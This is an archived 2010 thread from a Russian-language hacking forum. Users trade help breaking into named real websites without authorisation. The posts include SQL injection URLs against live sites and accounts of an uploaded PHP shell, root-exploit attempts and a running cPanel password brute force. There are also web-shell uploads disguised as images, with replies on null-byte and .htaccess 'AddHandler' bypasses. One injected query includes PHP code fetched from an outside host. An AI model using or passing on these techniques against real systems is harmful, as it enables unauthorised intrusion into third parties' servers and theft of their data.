HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15331  
Старый 14.10.2010, 13:53
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Mirrey  
Mirrey said:
Есть скуля, таблицы можно выводить только по одной, через limit. Как можно вывести сразу все таблицы?
Ты скулю то покажи : O
 
Ответить с цитированием

  #15332  
Старый 14.10.2010, 13:54
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от Mirrey  
Mirrey said:
Есть скуля, таблицы можно выводить только по одной, через limit. Как можно вывести сразу все таблицы?
Вот, не так давно выкладывал скрипт, дампит таблицы через limit в ошибке (MySQL 4.1>=)

/showthread.php?p=2352621#post2352621

Заточить под себя не сложно.
 
Ответить с цитированием

  #15333  
Старый 14.10.2010, 14:04
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
Пробуй подменить Content-Type.
Всмысле подменить?) где именно?)

Если можеш, обьясни плз подробнее.
 
Ответить с цитированием

  #15334  
Старый 14.10.2010, 14:06
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Всмысле подменить?) где именно?)
Если можеш, обьясни плз подробнее.
/showthread.php?p=2344055#post2344055
 
Ответить с цитированием

  #15335  
Старый 14.10.2010, 14:18
madmg
Новичок
Регистрация: 09.01.2008
Сообщений: 1
Провел на форуме:
33302

Репутация: 0
По умолчанию

всем привет у менеа ести маленкая проблема, саит такои _quanttest.ro, ести доступ к cpanel и через ftp, тут все панятно, но у саита ести 2-я части, если залогинится пасылают вас на саит >>> network.quanttest.ro, из cpanel доступa к нему нету (из ошиблки видно што он находитця в другой директорие на серваке /home/fnet а другои в папке /home/qt) мне к нему надобы подобратсеа. sql ести но запрос я подобрати не как не магу.

Цитата:
Сообщение от None  
http://network.quanttest.ro/index.php?target=distributorSearch&select=-id&searchval=ROU000003001
Цитата:
Сообщение от None  
Unknown column 'privatedata.-id' in 'where clause'
отпешитеси y каво какие идеи ести.

еа писал на форуме но, ребеата вличку не отзиваиутсеа, админи стеорли мои пост... , наверное сылаияси на то что я занимаиуси смапамам или из за отсуствие постов.

PS shh не фурычит, залил phpshell, начил искати подход к root, exploit на linux 2.6.18, apache 2.2.16 но безрезультатно.

PSS на даном моменте работает брут на для спанел на базе perl, но результат мало вероятнии пароли 13-и значние, всеотаки админ не полнии ламер
 
Ответить с цитированием

  #15336  
Старый 14.10.2010, 15:06
zolter
Guest
Сообщений: n/a
Провел на форуме:
784

Репутация: 0
По умолчанию

Народ, помогите с http://parus-grad.com.ua/SearchResult.html?ot=(select+test) плиз. Как добраться до списка таблиц?
 
Ответить с цитированием

  #15337  
Старый 14.10.2010, 19:53
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Вообщем получилось залить шелл вот так shell.php.jpg

Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O

---------

https://www.enzymedica.com/images/products/39_win4.php.gif

https://www.enzymedica.com/images/products/39_win4.php.swf

https://www.enzymedica.com/images/products/39_win2.php%2500.jpg

help
 
Ответить с цитированием

  #15338  
Старый 14.10.2010, 21:08
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Вообщем получилось залить шелл вот так shell.php.jpg
Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O
---------
https://www.enzymedica.com/images/products/39_win4.php.gif
https://www.enzymedica.com/images/products/39_win4.php.swf
https://www.enzymedica.com/images/products/39_win2.php%2500.jpg
help
а ты чего ожидал? у тебя конечный формат-картинка

такое прокатит очень редко, если хтаксесс настроенo неправильно
 
Ответить с цитированием

  #15339  
Старый 14.10.2010, 21:58
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Вообщем получилось залить шелл вот так shell.php.jpg
Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O
---------
https://www.enzymedica.com/images/products/39_win4.php.gif
https://www.enzymedica.com/images/products/39_win4.php.swf
https://www.enzymedica.com/images/products/39_win2.php%2500.jpg
help
Ищи инклуд и инклудь шелл.

Пытайся залить свой .htaccess и пропиши исполнение jpg файлов (AddHandler application/x-httpd-php .jpg)

Если файл проходит через функцию copy(), при заливке прокатит нулл байт (shell.php%00.jpg), расширение обрежется и ты получишь полноценный шелл.

П.С. Ты будешь теперь каждое действие спрашивать? Проще было написать, я ничего не знаю, дайте мне ссылку на залитый шелл.
 
Ответить с цитированием

  #15340  
Старый 15.10.2010, 02:54
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Цитата:
Сообщение от None  
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`testing` (`shell`) VALUES ('<? include 'http://goomihas.narod.ru/testing.php' ?' at line 1
что за шляпа???шелл литься не хочет

p.s какие есть способы залития шелла в phpmyadmin?????

и что можно сделать имея доступ в phpmyadmin?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ